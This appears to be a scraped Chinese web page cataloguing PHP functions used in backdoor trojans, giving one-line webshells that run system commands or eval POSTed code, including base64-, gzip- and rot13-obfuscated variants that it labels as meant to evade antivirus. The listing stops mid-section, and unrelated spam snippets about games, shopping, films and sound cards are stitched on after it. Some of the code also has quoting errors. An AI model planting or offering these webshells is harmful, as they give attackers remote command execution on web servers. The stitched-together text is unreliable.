php后门木马常用的函数大致上可分为四种类型:
1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
1. 执行系统命令:
system 函数
//test.php?cmd=ls
system($_GET[cmd]);
passthru 函数
//test.php?cmd=ls
passthru($_GET[cmd]);
shell_exec 函数
//test.php?cmd=ls
echo shell_exec($_GET[cmd]);
exec 函数
//test.php?cmd=ls
$arr = array();
exec($_GET[cmd],$arr);
print_r($arr);
popen 函数
//test.php?cmd=ls
$handle = popen('$_GET[cmd], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);
proc_open 函数
//test.php?cmd=ls
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w'),
);
$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
print_r($output);
2. 代码执行与加密:
eval 函数
//最常见的一句话木马
eval($_POST[cmd]);
base64_decode 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
gzinflate 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
gzuncompress 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
gzdecode 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
str_rot13 函数
//为了免杀及隐藏而加密代码
//密文: eval($_POST[cmd]);
eval(str_rot13('riny($_CBFG[pzq]);'));
assert 函数
//类似eval函数
assert($_POST[cmd]);
call_user_func 函数
//使用call_user_func调用assert
call_user_func('assert',$_POST[cmd]);
call_user_func 函数
云顶之弈10.8版本已经更新上线了,这次新版本和以前相比,更新的内容并不多,主要是一些英雄和装备的调整。那么云顶之弈新版本装备合成公式是什么?大家知道,云顶之弈非常多的装备,不同的小装备可以合成大装备...
成果网站用户信息盗取4.Sandcat Browser(免费产品)触及常识点:Windbg目录结构、脚本履行流程、插件开发,给官方ext插件打补丁等。 · 外部安全缝隙在此基础上进行优化,完成整个流程...
做为传统电商榜样的淘宝网,及其京东商城 大伙儿自然广为人知,每一次抢货的情况下,绝对没有一点儿悲痛之欲 这也侧边体现了,大家针对服务平台的认同度! 过犹不及,盛极必衰。尽管有一定...
同样的故事,不同的演绎。 10月20日,聊斋系列院线电影“聊斋新编四部曲”(《聊斋新编之画皮人》《聊斋新编之婴宁》《聊斋新编之辛十四娘》《聊斋新编之鸦头》)在象山影视城开机。电影由尹波执导,无限...
本文目录一览: 1、都市异能类 男主角 开始很穷 送快递 期间被3名美女调戏 后认识一名退隐会异能的美女姐姐 让主角享 2、免费的黑客入门视频下载 3、从一夜暴富到被逼到悬崖边缘,回顾华谊兄弟...
最先看一下声显示屏右下方是否有喇叭图标,有得话,证实外置声卡已安裝。 沒有得话,请右键电子计算机点一下管理方法。 点击设备管理方法,选响声视頻和游戏控制器,假如下边有声音led...